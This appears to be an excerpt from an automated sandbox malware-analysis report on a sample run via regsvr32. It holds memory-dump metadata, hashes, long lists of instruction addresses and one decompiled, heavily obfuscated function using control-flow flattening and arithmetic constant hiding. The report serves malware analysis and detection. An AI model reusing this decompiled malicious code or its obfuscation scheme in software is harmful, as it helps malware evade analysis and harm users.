                                                                                                                0x001b20da
                                                                                                                0x001b20e2
                                                                                                                0x001b20e2
                                                                                                                0x001b20e2
                                                                                                                0x001b20e2
                                                                                                                0x001b20e8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b20ee
                                                                                                                0x001b2213
                                                                                                                0x001b2224
                                                                                                                0x001b2226
                                                                                                                0x001b222d
                                                                                                                0x001b223b
                                                                                                                0x00000000
                                                                                                                0x001b20f4
                                                                                                                0x001b20fa
                                                                                                                0x001b21f4
                                                                                                                0x001b21fa
                                                                                                                0x00000000
                                                                                                                0x001b2100
                                                                                                                0x001b2106
                                                                                                                0x001b21a8
                                                                                                                0x001b21c8
                                                                                                                0x001b21cd
                                                                                                                0x001b21d2
                                                                                                                0x001b21d8
                                                                                                                0x00000000
                                                                                                                0x001b21d8
                                                                                                                0x001b210c
                                                                                                                0x001b2112
                                                                                                                0x001b219e
                                                                                                                0x00000000
                                                                                                                0x001b2118
                                                                                                                0x001b211e
                                                                                                                0x00000000
                                                                                                                0x001b2124
                                                                                                                0x001b212f
                                                                                                                0x001b213d
                                                                                                                0x001b2146
                                                                                                                0x001b2150
                                                                                                                0x001b2179
                                                                                                                0x001b2184
                                                                                                                0x001b2189
                                                                                                                0x001b218e
                                                                                                                0x001b2194
                                                                                                                0x00000000
                                                                                                                0x001b2194
                                                                                                                0x001b218e
                                                                                                                0x001b211e
                                                                                                                0x001b2112
                                                                                                                0x001b2106
                                                                                                                0x001b20fa
                                                                                                                0x001b23bb
                                                                                                                0x001b23c6
                                                                                                                0x001b23c6
                                                                                                                0x001b2249
                                                                                                                0x001b236b
                                                                                                                0x001b2370
                                                                                                                0x001b2375
                                                                                                                0x001b2378
                                                                                                                0x001b237c
                                                                                                                0x001b2392
                                                                                                                0x00000000
                                                                                                                0x001b237e
                                                                                                                0x001b2380
                                                                                                                0x001b2385
                                                                                                                0x001b2386
                                                                                                                0x00000000
                                                                                                                0x001b2386
                                                                                                                0x001b224f
                                                                                                                0x001b2255
                                                                                                                0x001b23b4
                                                                                                                0x001b225b
                                                                                                                0x001b2261
                                                                                                                0x001b233d
                                                                                                                0x001b2348
                                                                                                                0x001b2350
                                                                                                                0x00000000
                                                                                                                0x001b2267
                                                                                                                0x001b226d
                                                                                                                0x00000000
                                                                                                                0x001b2273
                                                                                                                0x001b2277
                                                                                                                0x001b2283
                                                                                                                0x001b228f
                                                                                                                0x001b22af
                                                                                                                0x001b22b4
                                                                                                                0x001b22bd
                                                                                                                0x001b22be
                                                                                                                0x001b22be
                                                                                                                0x001b22c5
                                                                                                                0x001b22cd
                                                                                                                0x001b22d2
                                                                                                                0x001b22d5
                                                                                                                0x001b22d8
                                                                                                                0x001b22dc
                                                                                                                0x001b22de
                                                                                                                0x001b22e5
                                                                                                                0x001b22e7
                                                                                                                0x001b22e7
                                                                                                                0x001b22ea
                                                                                                                0x001b22eb
                                                                                                                0x001b22de
                                                                                                                0x001b22fe
                                                                                                                0x001b2303
                                                                                                                0x001b2308
                                                                                                                0x001b230b
                                                                                                                0x001b2310
                                                                                                                0x001b2314
                                                                                                                0x00000000
                                                                                                                0x001b2314
                                                                                                                0x001b226d
                                                                                                                0x001b2261
                                                                                                                0x001b2255
                                                                                                                0x00000000
                                                                                                                0x001b2397
                                                                                                                0x001b2397
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $BO$DZs/$IeO$RHf$T($`$qNv$v
                                                                                                                • API String ID: 0-3631915167
                                                                                                                • Opcode ID: 92e239ade607393e425f5dba0ea291aa626a443c41db43d432ee5a7c7039a24a
                                                                                                                • Instruction ID: 15db849e33d21f34b30541b78871690ad21d485cb6fdbdcdf78ee8e48f3213c8
                                                                                                                • Opcode Fuzzy Hash: 92e239ade607393e425f5dba0ea291aa626a443c41db43d432ee5a7c7039a24a
                                                                                                                • Instruction Fuzzy Hash: BE2222B15083809FD368CF25C48AA9BFBE1FBD5344F108A1DE6DA86261D7B18949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A4313 Relevance: 11.6, Strings: 9, Instructions: 365COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E001A4313() {
				void* _t369;
				signed int _t371;
				signed int _t372;
				intOrPtr _t374;
				signed int _t376;
				signed int _t378;
				signed int _t389;
				signed int _t394;
				void* _t398;
				signed int _t435;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t447;
				void* _t451;

				 *((intOrPtr*)(_t451 + 0xa0)) = 0x481ee2;
				 *(_t451 + 0xa8) =  *(_t451 + 0xa8) & 0x00000000;
				asm("stosd");
				_t438 = 0x5a;
				asm("stosd");
				_t398 = 0xda67f00;
				asm("stosd");
				 *(_t451 + 0xa4) = 0xbf1562;
				 *(_t451 + 0xa4) =  *(_t451 + 0xa4) >> 0x10;
				 *(_t451 + 0xa4) =  *(_t451 + 0xa4) ^ 0x000000be;
				 *(_t451 + 0x48) = 0xb2e312;
				 *(_t451 + 0x48) =  *(_t451 + 0x48) / _t438;
				_t439 = 0x7a;
				 *(_t451 + 0x48) =  *(_t451 + 0x48) / _t439;
				 *(_t451 + 0x48) =  *(_t451 + 0x48) ^ 0x0000042a;
				 *(_t451 + 0x4c) = 0xaab8a4;
				 *(_t451 + 0x4c) =  *(_t451 + 0x4c) + 0xd870;
				_t440 = 0x78;
				 *(_t451 + 0x48) =  *(_t451 + 0x4c) * 0x5d;
				 *(_t451 + 0x48) =  *(_t451 + 0x48) ^ 0x3e53b447;
				 *(_t451 + 0x24) = 0x35a539;
				 *(_t451 + 0x24) =  *(_t451 + 0x24) ^ 0x02c100d7;
				 *(_t451 + 0x24) =  *(_t451 + 0x24) * 0x3f;
				 *(_t451 + 0x24) =  *(_t451 + 0x24) << 0xc;
				 *(_t451 + 0x24) =  *(_t451 + 0x24) ^ 0x4d5183e4;
				 *(_t451 + 0x64) = 0x926655;
				 *(_t451 + 0x64) =  *(_t451 + 0x64) + 0x74d8;
				 *(_t451 + 0x64) =  *(_t451 + 0x64) ^ 0x6016a5fc;
				 *(_t451 + 0x64) =  *(_t451 + 0x64) ^ 0x60895938;
				 *(_t451 + 0x2c) = 0xd6cba1;
				 *(_t451 + 0x2c) =  *(_t451 + 0x2c) >> 0xa;
				 *(_t451 + 0x2c) =  *(_t451 + 0x2c) | 0x6c405702;
				 *(_t451 + 0x2c) =  *(_t451 + 0x2c) + 0x6e69;
				 *(_t451 + 0x2c) =  *(_t451 + 0x2c) ^ 0x6c45778b;
				 *(_t451 + 0x88) = 0xaa579a;
				 *(_t451 + 0x88) =  *(_t451 + 0x88) + 0xf061;
				 *(_t451 + 0x88) =  *(_t451 + 0x88) ^ 0x00a76d8e;
				 *(_t451 + 0x74) = 0x9e8235;
				 *(_t451 + 0x74) =  *(_t451 + 0x74) + 0xffff828c;
				 *(_t451 + 0x74) =  *(_t451 + 0x74) | 0x86deb096;
				 *(_t451 + 0x74) =  *(_t451 + 0x74) ^ 0x86d8bdb3;
				 *(_t451 + 0x54) = 0xf5a295;
				 *(_t451 + 0x54) =  *(_t451 + 0x54) + 0x2fae;
				 *(_t451 + 0x54) =  *(_t451 + 0x54) / _t440;
				 *(_t451 + 0x54) =  *(_t451 + 0x54) ^ 0x000c86a2;
				 *(_t451 + 0x98) = 0xad9eaa;
				 *(_t451 + 0x98) =  *(_t451 + 0x98) * 0x4f;
				 *(_t451 + 0x98) =  *(_t451 + 0x98) ^ 0x359a584e;
				 *(_t451 + 0x1c) = 0x9df989;
				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) + 0xffff10d5;
				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) >> 1;
				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) + 0xffffab5d;
				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) ^ 0x0040b406;
				 *(_t451 + 0x34) = 0x3a80a9;
				 *(_t451 + 0x34) =  *(_t451 + 0x34) << 4;
				 *(_t451 + 0x34) =  *(_t451 + 0x34) << 2;
				 *(_t451 + 0x34) =  *(_t451 + 0x34) >> 0x10;
				 *(_t451 + 0x34) =  *(_t451 + 0x34) ^ 0x000f81ac;
				 *(_t451 + 0x4c) = 0xd0eab4;
				 *(_t451 + 0x4c) =  *(_t451 + 0x4c) ^ 0xf9224d3f;
				 *(_t451 + 0x4c) =  *(_t451 + 0x4c) ^ 0xc93cfb98;
				 *(_t451 + 0x4c) =  *(_t451 + 0x4c) ^ 0x30c06211;
				 *(_t451 + 0x14) = 0xd7baa6;
				 *(_t451 + 0x14) =  *(_t451 + 0x14) ^ 0x9b1982f2;
				 *(_t451 + 0x14) =  *(_t451 + 0x14) + 0xffff3cb1;
				 *(_t451 + 0x14) =  *(_t451 + 0x14) >> 0xd;
				 *(_t451 + 0x14) =  *(_t451 + 0x14) ^ 0x00032c44;
				 *(_t451 + 0x78) = 0xe4d0af;
				_t441 = 0x42;
				 *(_t451 + 0x7c) =  *(_t451 + 0x78) / _t441;
				 *(_t451 + 0x7c) =  *(_t451 + 0x7c) << 5;
				 *(_t451 + 0x7c) =  *(_t451 + 0x7c) ^ 0x0067e08b;
				 *(_t451 + 0x84) = 0x3f4ae4;
				 *(_t451 + 0x84) =  *(_t451 + 0x84) + 0x5ff4;
				 *(_t451 + 0x84) =  *(_t451 + 0x84) ^ 0x00376670;
				 *(_t451 + 0x94) = 0x4dfb72;
				_t442 = 0x64;
				 *(_t451 + 0x94) =  *(_t451 + 0x94) * 0x60;
				 *(_t451 + 0x94) =  *(_t451 + 0x94) ^ 0x1d344795;
				 *(_t451 + 0x1c) = 0xc30a93;
				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) << 6;
				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) + 0x66e3;
				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) << 0xe;
				 *(_t451 + 0x1c) =  *(_t451 + 0x1c) ^ 0xc2e8d13d;
				 *(_t451 + 0x98) = 0x5304b3;
				 *(_t451 + 0x98) =  *(_t451 + 0x98) << 0xc;
				 *(_t451 + 0x98) =  *(_t451 + 0x98) ^ 0x30427672;
				 *(_t451 + 0x70) = 0x179a69;
				 *(_t451 + 0x70) =  *(_t451 + 0x70) + 0x35c0;
				 *(_t451 + 0x70) =  *(_t451 + 0x70) * 0x5b;
				 *(_t451 + 0x70) =  *(_t451 + 0x70) ^ 0x0876ade6;
				 *(_t451 + 0x88) = 0xbc1111;
				 *(_t451 + 0x88) =  *(_t451 + 0x88) << 0x10;
				 *(_t451 + 0x88) =  *(_t451 + 0x88) ^ 0x111f6c12;
				 *(_t451 + 0x24) = 0x8d085f;
				 *(_t451 + 0x24) =  *(_t451 + 0x24) + 0xa827;
				 *(_t451 + 0x24) =  *(_t451 + 0x24) + 0xf853;
				 *(_t451 + 0x24) =  *(_t451 + 0x24) ^ 0x74c8cdbe;
				 *(_t451 + 0x24) =  *(_t451 + 0x24) ^ 0x7441d83e;
				 *(_t451 + 0xa8) = 0x59286f;
				 *(_t451 + 0xa8) =  *(_t451 + 0xa8) | 0xf263580b;
				 *(_t451 + 0xa8) =  *(_t451 + 0xa8) ^ 0xf2718210;
				 *(_t451 + 0x54) = 0xc438c7;
				 *(_t451 + 0x54) =  *(_t451 + 0x54) / _t442;
				_t443 = 0x3b;
				 *(_t451 + 0x50) =  *(_t451 + 0x54) * 0x37;
				 *(_t451 + 0x50) =  *(_t451 + 0x50) ^ 0x006e4e34;
				 *(_t451 + 0x3c) = 0x907efd;
				 *(_t451 + 0x3c) =  *(_t451 + 0x3c) >> 9;
				 *(_t451 + 0x3c) =  *(_t451 + 0x3c) << 7;
				 *(_t451 + 0x3c) =  *(_t451 + 0x3c) ^ 0x0029805f;
				 *(_t451 + 0x9c) = 0xb00ef7;
				 *(_t451 + 0x9c) =  *(_t451 + 0x9c) + 0xa0b3;
				 *(_t451 + 0x9c) =  *(_t451 + 0x9c) ^ 0x00bd8a86;
				 *(_t451 + 0x28) = 0x6076e2;
				 *(_t451 + 0x28) =  *(_t451 + 0x28) | 0xceaeb24a;
				 *(_t451 + 0x28) =  *(_t451 + 0x28) << 2;
				 *(_t451 + 0x28) =  *(_t451 + 0x28) << 8;
				 *(_t451 + 0x28) =  *(_t451 + 0x28) ^ 0xbbdaa60d;
				 *(_t451 + 0x60) = 0x8d7874;
				 *(_t451 + 0x60) =  *(_t451 + 0x60) | 0x627ab4a7;
				 *(_t451 + 0x60) =  *(_t451 + 0x60) / _t443;
				 *(_t451 + 0x60) =  *(_t451 + 0x60) ^ 0x01a5ba19;
				 *(_t451 + 0x8c) = 0xb964e2;
				 *(_t451 + 0x8c) =  *(_t451 + 0x8c) | 0x5710154c;
				 *(_t451 + 0x8c) =  *(_t451 + 0x8c) ^ 0x57bba904;
				 *(_t451 + 0x58) = 0x114838;
				 *(_t451 + 0x58) =  *(_t451 + 0x58) << 8;
				 *(_t451 + 0x58) =  *(_t451 + 0x58) + 0xffffe1fe;
				 *(_t451 + 0x58) =  *(_t451 + 0x58) ^ 0x114e4f49;
				 *(_t451 + 0x68) = 0x9b2ff3;
				_t444 = 0x4a;
				_t396 =  *(_t451 + 0x7c);
				 *(_t451 + 0x68) =  *(_t451 + 0x68) / _t444;
				 *(_t451 + 0x68) =  *(_t451 + 0x68) << 0xd;
				 *(_t451 + 0x68) =  *(_t451 + 0x68) ^ 0x4310abae;
				 *(_t451 + 0x30) = 0x75df9f;
				 *(_t451 + 0x30) =  *(_t451 + 0x30) | 0x77fbbb7f;
				 *(_t451 + 0x30) =  *(_t451 + 0x30) ^ 0x9a588fec;
				 *(_t451 + 0x30) =  *(_t451 + 0x30) ^ 0xeda39833;
				 *(_t451 + 0x5c) = 0x8b5b73;
				 *(_t451 + 0x5c) =  *(_t451 + 0x5c) + 0x2955;
				 *(_t451 + 0x5c) =  *(_t451 + 0x5c) << 0xb;
				 *(_t451 + 0x5c) =  *(_t451 + 0x5c) ^ 0x5c21f1b7;
				 *(_t451 + 0x10) = 0xfa7ab0;
				 *(_t451 + 0x10) =  *(_t451 + 0x10) << 0xe;
				 *(_t451 + 0x10) =  *(_t451 + 0x10) + 0xffffc644;
				 *(_t451 + 0x10) =  *(_t451 + 0x10) + 0xffffc27f;
				 *(_t451 + 0x10) =  *(_t451 + 0x10) ^ 0x9eaad59e;
				 *(_t451 + 0x38) = 0xc66bc1;
				 *(_t451 + 0x38) =  *(_t451 + 0x38) + 0xffff1251;
				_t435 =  *(_t451 + 0x7c);
				_t449 =  *(_t451 + 0x7c);
				_t445 =  *(_t451 + 0x7c);
				 *(_t451 + 0x38) =  *(_t451 + 0x38) * 0x35;
				 *(_t451 + 0x38) =  *(_t451 + 0x38) + 0xb26f;
				 *(_t451 + 0x38) =  *(_t451 + 0x38) ^ 0x28eaa94f;
				 *(_t451 + 0x40) = 0x426fa7;
				 *(_t451 + 0x40) =  *(_t451 + 0x40) + 0xffffb5fe;
				 *(_t451 + 0x40) =  *(_t451 + 0x40) + 0x2061;
				 *(_t451 + 0x40) =  *(_t451 + 0x40) ^ 0x0046db62;
				 *(_t451 + 0x70) = 0x509d7a;
				 *(_t451 + 0x70) =  *(_t451 + 0x70) * 0x29;
				 *(_t451 + 0x70) =  *(_t451 + 0x70) ^ 0x122873ad;
				 *(_t451 + 0x70) =  *(_t451 + 0x70) ^ 0x1eceaae2;
				while(1) {
					L1:
					_t369 = 0x46a5dd8;
					do {
						L2:
						while(_t398 != _t369) {
							if(_t398 == 0x5ae9815) {
								_t445 = 0x1000;
								_push(_t398);
								 *(_t451 + 0x88) = 0x1000;
								_t435 = E001A303A(_t398, 0x1000);
								_t451 = _t451 + 0xc;
								__eflags = _t435;
								_t369 = 0x46a5dd8;
								_t398 =  !=  ? 0x46a5dd8 : 0xb2df5d2;
								continue;
							} else {
								if(_t398 == 0xb17a6c0) {
									E001B17D2( *(_t451 + 0x5c),  *(_t451 + 0x10), _t435);
									_t398 = 0xb2df5d2;
									while(1) {
										L1:
										_t369 = 0x46a5dd8;
										goto L2;
									}
								} else {
									if(_t398 == 0xb2df5d2) {
										E001B02D8(_t396,  *(_t451 + 0x40),  *((intOrPtr*)(_t451 + 0x44)),  *(_t451 + 0x70));
									} else {
										if(_t398 == 0xca7cecc) {
											E001C0575( *(_t451 + 0x30),  *(_t451 + 0x68), __eflags, _t398, _t451 + 0xc4,  *(_t451 + 0x2c));
											_t312 = _t451 + 0x84; // 0x376670
											_t389 = E001A2263(_t451 + 0xd0,  *(_t451 + 0x9c),  *_t312,  *(_t451 + 0x60));
											_t449 = _t389;
											_t451 = _t451 + 0x14;
											_t398 = 0xebe567b;
											 *((short*)(_t389 - 2)) = 0;
											while(1) {
												L1:
												_t369 = 0x46a5dd8;
												goto L2;
											}
										} else {
											if(_t398 == 0xda67f00) {
												_t398 = 0xca7cecc;
												continue;
											} else {
												if(_t398 != 0xebe567b) {
													goto L28;
												} else {
													_t297 = _t451 + 0x84; // 0x376670
													_t394 = E001BA50A( *((intOrPtr*)(_t451 + 0xc8)),  *(_t451 + 0x74),  *((intOrPtr*)(_t451 + 0x44)),  *(_t451 + 0x58), 0x2000000,  *(_t451 + 0x68),  *(_t451 + 0x2c), 1, _t398,  *(_t451 + 0x84),  *(_t451 + 0x4c) | 0x00000006,  *_t297, _t451 + 0xc0);
													_t396 = _t394;
													_t451 = _t451 + 0x30;
													if(_t394 != 0xffffffff) {
														_t398 = 0x5ae9815;
														while(1) {
															L1:
															_t369 = 0x46a5dd8;
															goto L2;
														}
													}
												}
											}
										}
									}
								}
							}
							L31:
							__eflags = 0;
							return 0;
						}
						_t371 = E001BEB61( *((intOrPtr*)(_t451 + 0xb4)),  *(_t451 + 0x50),  *((intOrPtr*)(_t451 + 0xcc)), _t445, _t451 + 0xb0, _t435,  *((intOrPtr*)(_t451 + 0xc0)),  *(_t451 + 0x68), _t398,  *(_t451 + 0x4c), _t396, _t398, _t398,  *(_t451 + 0x9c));
						_t451 = _t451 + 0x30;
						__eflags = _t371;
						if(_t371 == 0) {
							_t372 =  *(_t451 + 0xa8);
						} else {
							_t447 = _t435;
							while(1) {
								__eflags =  *((intOrPtr*)(_t447 + 4)) - 4;
								if( *((intOrPtr*)(_t447 + 4)) != 4) {
									goto L19;
								}
								L18:
								_t332 = _t447 + 0xc; // 0x67e097
								_t378 = E001ABEE4( *(_t451 + 0x34),  *((intOrPtr*)(_t451 + 0x6c)), _t332,  *(_t451 + 0x94), _t449,  *(_t451 + 0x58));
								_t451 = _t451 + 0x10;
								__eflags = _t378;
								if(_t378 == 0) {
									_t372 = 1;
									 *(_t451 + 0xa8) = 1;
								} else {
									goto L19;
								}
								L24:
								_t445 =  *(_t451 + 0x7c);
								goto L25;
								L19:
								_t376 =  *_t447;
								__eflags = _t376;
								if(_t376 == 0) {
									_t372 =  *(_t451 + 0xa8);
								} else {
									_t447 = _t447 + _t376;
									__eflags =  *((intOrPtr*)(_t447 + 4)) - 4;
									if( *((intOrPtr*)(_t447 + 4)) != 4) {
										goto L19;
									}
								}
								goto L24;
							}
						}
						L25:
						__eflags = _t372;
						if(_t372 == 0) {
							_t369 = 0x46a5dd8;
							_t398 = 0x46a5dd8;
							goto L28;
						} else {
							_t374 =  *0x1c4c14; // 0x0
							E001B487B( *(_t451 + 0x68),  *(_t451 + 0x30),  *((intOrPtr*)(_t374 + 0x1c)));
							_t398 = 0xb17a6c0;
							goto L1;
						}
						goto L31;
						L28:
						__eflags = _t398 - 0x16de6b2;
					} while (__eflags != 0);
					goto L31;
				}
			}























                                                                                                                0x001a4319
                                                                                                                0x001a4331
                                                                                                                0x001a4339
                                                                                                                0x001a433e
                                                                                                                0x001a4341
                                                                                                                0x001a4342
                                                                                                                0x001a4347
                                                                                                                0x001a4348
                                                                                                                0x001a4353
                                                                                                                0x001a435b
                                                                                                                0x001a4366
                                                                                                                0x001a4376
                                                                                                                0x001a437e
                                                                                                                0x001a4383
                                                                                                                0x001a4389
                                                                                                                0x001a4391
                                                                                                                0x001a4399
                                                                                                                0x001a43a6
                                                                                                                0x001a43a7
                                                                                                                0x001a43ab
                                                                                                                0x001a43b3
                                                                                                                0x001a43bb
                                                                                                                0x001a43c8
                                                                                                                0x001a43cc
                                                                                                                0x001a43d1
                                                                                                                0x001a43d9
                                                                                                                0x001a43e1
                                                                                                                0x001a43e9
                                                                                                                0x001a43f1
                                                                                                                0x001a43f9
                                                                                                                0x001a4401
                                                                                                                0x001a4406
                                                                                                                0x001a440e
                                                                                                                0x001a4416
                                                                                                                0x001a441e
                                                                                                                0x001a4429
                                                                                                                0x001a4434
                                                                                                                0x001a443f
                                                                                                                0x001a4447
                                                                                                                0x001a444f
                                                                                                                0x001a4457
                                                                                                                0x001a445f
                                                                                                                0x001a4467
                                                                                                                0x001a4475
                                                                                                                0x001a4479
                                                                                                                0x001a4481
                                                                                                                0x001a4494
                                                                                                                0x001a449b
                                                                                                                0x001a44a6
                                                                                                                0x001a44ae
                                                                                                                0x001a44b6
                                                                                                                0x001a44ba
                                                                                                                0x001a44c2
                                                                                                                0x001a44ca
                                                                                                                0x001a44d2
                                                                                                                0x001a44d7
                                                                                                                0x001a44dc
                                                                                                                0x001a44e1
                                                                                                                0x001a44e9
                                                                                                                0x001a44f1
                                                                                                                0x001a44f9
                                                                                                                0x001a4503
                                                                                                                0x001a450b
                                                                                                                0x001a4513
                                                                                                                0x001a451b
                                                                                                                0x001a4523
                                                                                                                0x001a4528
                                                                                                                0x001a4530
                                                                                                                0x001a453e
                                                                                                                0x001a4543
                                                                                                                0x001a4549
                                                                                                                0x001a454e
                                                                                                                0x001a4556
                                                                                                                0x001a4561
                                                                                                                0x001a456c
                                                                                                                0x001a4577
                                                                                                                0x001a458a
                                                                                                                0x001a458d
                                                                                                                0x001a4594
                                                                                                                0x001a459f
                                                                                                                0x001a45a7
                                                                                                                0x001a45ac
                                                                                                                0x001a45b4
                                                                                                                0x001a45b9
                                                                                                                0x001a45c1
                                                                                                                0x001a45cc
                                                                                                                0x001a45d4
                                                                                                                0x001a45df
                                                                                                                0x001a45e7
                                                                                                                0x001a45f4
                                                                                                                0x001a45f8
                                                                                                                0x001a4600
                                                                                                                0x001a460b
                                                                                                                0x001a4613
                                                                                                                0x001a461e
                                                                                                                0x001a4626
                                                                                                                0x001a462e
                                                                                                                0x001a4636
                                                                                                                0x001a463e
                                                                                                                0x001a4646
                                                                                                                0x001a4651
                                                                                                                0x001a465c
                                                                                                                0x001a4667
                                                                                                                0x001a4677
                                                                                                                0x001a4680
                                                                                                                0x001a4681
                                                                                                                0x001a4685
                                                                                                                0x001a468d
                                                                                                                0x001a4695
                                                                                                                0x001a469a
                                                                                                                0x001a469f
                                                                                                                0x001a46a7
                                                                                                                0x001a46b2
                                                                                                                0x001a46bd
                                                                                                                0x001a46c8
                                                                                                                0x001a46d0
                                                                                                                0x001a46d8
                                                                                                                0x001a46dd
                                                                                                                0x001a46e2
                                                                                                                0x001a46ea
                                                                                                                0x001a46f2
                                                                                                                0x001a4700
                                                                                                                0x001a4704
                                                                                                                0x001a470c
                                                                                                                0x001a4717
                                                                                                                0x001a4722
                                                                                                                0x001a472d
                                                                                                                0x001a4737
                                                                                                                0x001a473c
                                                                                                                0x001a4744
                                                                                                                0x001a474c
                                                                                                                0x001a475a
                                                                                                                0x001a475d
                                                                                                                0x001a4761
                                                                                                                0x001a4765
                                                                                                                0x001a476a
                                                                                                                0x001a4772
                                                                                                                0x001a477a
                                                                                                                0x001a4782
                                                                                                                0x001a478a
                                                                                                                0x001a4792
                                                                                                                0x001a479a
                                                                                                                0x001a47a2
                                                                                                                0x001a47a7
                                                                                                                0x001a47af
                                                                                                                0x001a47b7
                                                                                                                0x001a47bc
                                                                                                                0x001a47c4
                                                                                                                0x001a47cc
                                                                                                                0x001a47d4
                                                                                                                0x001a47dc
                                                                                                                0x001a47e9
                                                                                                                0x001a47ed
                                                                                                                0x001a47f1
                                                                                                                0x001a47f5
                                                                                                                0x001a47f9
                                                                                                                0x001a4801
                                                                                                                0x001a4809
                                                                                                                0x001a4811
                                                                                                                0x001a4819
                                                                                                                0x001a4821
                                                                                                                0x001a4829
                                                                                                                0x001a4836
                                                                                                                0x001a483a
                                                                                                                0x001a4842
                                                                                                                0x001a484a
                                                                                                                0x001a484a
                                                                                                                0x001a484a
                                                                                                                0x001a484f
                                                                                                                0x00000000
                                                                                                                0x001a484f
                                                                                                                0x001a485d
                                                                                                                0x001a4969
                                                                                                                0x001a4980
                                                                                                                0x001a4983
                                                                                                                0x001a498f
                                                                                                                0x001a4991
                                                                                                                0x001a4994
                                                                                                                0x001a499b
                                                                                                                0x001a49a0
                                                                                                                0x00000000
                                                                                                                0x001a4863
                                                                                                                0x001a4869
                                                                                                                0x001a4955
                                                                                                                0x001a495b
                                                                                                                0x001a484a
                                                                                                                0x001a484a
                                                                                                                0x001a484a
                                                                                                                0x00000000
                                                                                                                0x001a484a
                                                                                                                0x001a486f
                                                                                                                0x001a4875
                                                                                                                0x001a4a87
                                                                                                                0x001a487b
                                                                                                                0x001a4881
                                                                                                                0x001a4914
                                                                                                                0x001a4924
                                                                                                                0x001a4932
                                                                                                                0x001a4937
                                                                                                                0x001a4939
                                                                                                                0x001a493e
                                                                                                                0x001a4943
                                                                                                                0x001a484a
                                                                                                                0x001a484a
                                                                                                                0x001a484a
                                                                                                                0x00000000
                                                                                                                0x001a484a
                                                                                                                0x001a4883
                                                                                                                0x001a4889
                                                                                                                0x001a48f5
                                                                                                                0x00000000
                                                                                                                0x001a488b
                                                                                                                0x001a4891
                                                                                                                0x00000000
                                                                                                                0x001a4897
                                                                                                                0x001a489f
                                                                                                                0x001a48d8
                                                                                                                0x001a48dd
                                                                                                                0x001a48df
                                                                                                                0x001a48e5
                                                                                                                0x001a48eb
                                                                                                                0x001a484a
                                                                                                                0x001a484a
                                                                                                                0x001a484a
                                                                                                                0x00000000
                                                                                                                0x001a484a
                                                                                                                0x001a484a
                                                                                                                0x001a48e5
                                                                                                                0x001a4891
                                                                                                                0x001a4889
                                                                                                                0x001a4881
                                                                                                                0x001a4875
                                                                                                                0x001a4869
                                                                                                                0x001a4a8e
                                                                                                                0x001a4a91
                                                                                                                0x001a4a9a
                                                                                                                0x001a4a9a
                                                                                                                0x001a49de
                                                                                                                0x001a49e3
                                                                                                                0x001a49e6
                                                                                                                0x001a49e8
                                                                                                                0x001a4a2c
                                                                                                                0x001a49ea
                                                                                                                0x001a49ea
                                                                                                                0x001a49ec
                                                                                                                0x001a49ec
                                                                                                                0x001a49f0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a49f2
                                                                                                                0x001a49f6
                                                                                                                0x001a4a0a
                                                                                                                0x001a4a0f
                                                                                                                0x001a4a12
                                                                                                                0x001a4a14
                                                                                                                0x001a4a22
                                                                                                                0x001a4a23
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a4a3c
                                                                                                                0x001a4a3c
                                                                                                                0x00000000
                                                                                                                0x001a4a16
                                                                                                                0x001a4a16
                                                                                                                0x001a4a18
                                                                                                                0x001a4a1a
                                                                                                                0x001a4a35
                                                                                                                0x001a4a1c
                                                                                                                0x001a4a1c
                                                                                                                0x001a49ec
                                                                                                                0x001a49f0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a49f0
                                                                                                                0x00000000
                                                                                                                0x001a4a1a
                                                                                                                0x001a49ec
                                                                                                                0x001a4a40
                                                                                                                0x001a4a40
                                                                                                                0x001a4a42
                                                                                                                0x001a4a64
                                                                                                                0x001a4a69
                                                                                                                0x00000000
                                                                                                                0x001a4a44
                                                                                                                0x001a4a44
                                                                                                                0x001a4a54
                                                                                                                0x001a4a5a
                                                                                                                0x00000000
                                                                                                                0x001a4a5a
                                                                                                                0x00000000
                                                                                                                0x001a4a6b
                                                                                                                0x001a4a6b
                                                                                                                0x001a4a6b
                                                                                                                0x00000000
                                                                                                                0x001a4a77

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: 4Nn$U)$a $in$o(Y$pf7$rvB0$f$v`
                                                                                                                • API String ID: 2962429428-3925418858
                                                                                                                • Opcode ID: a6f9b21d7378f3e9ed87a34ea381f4048454587f0797339b73997999416b7569
                                                                                                                • Instruction ID: 26e3af096168f308c65bdd10acf6ee83e87b7eed4b52d3fa748a55e110a9933b
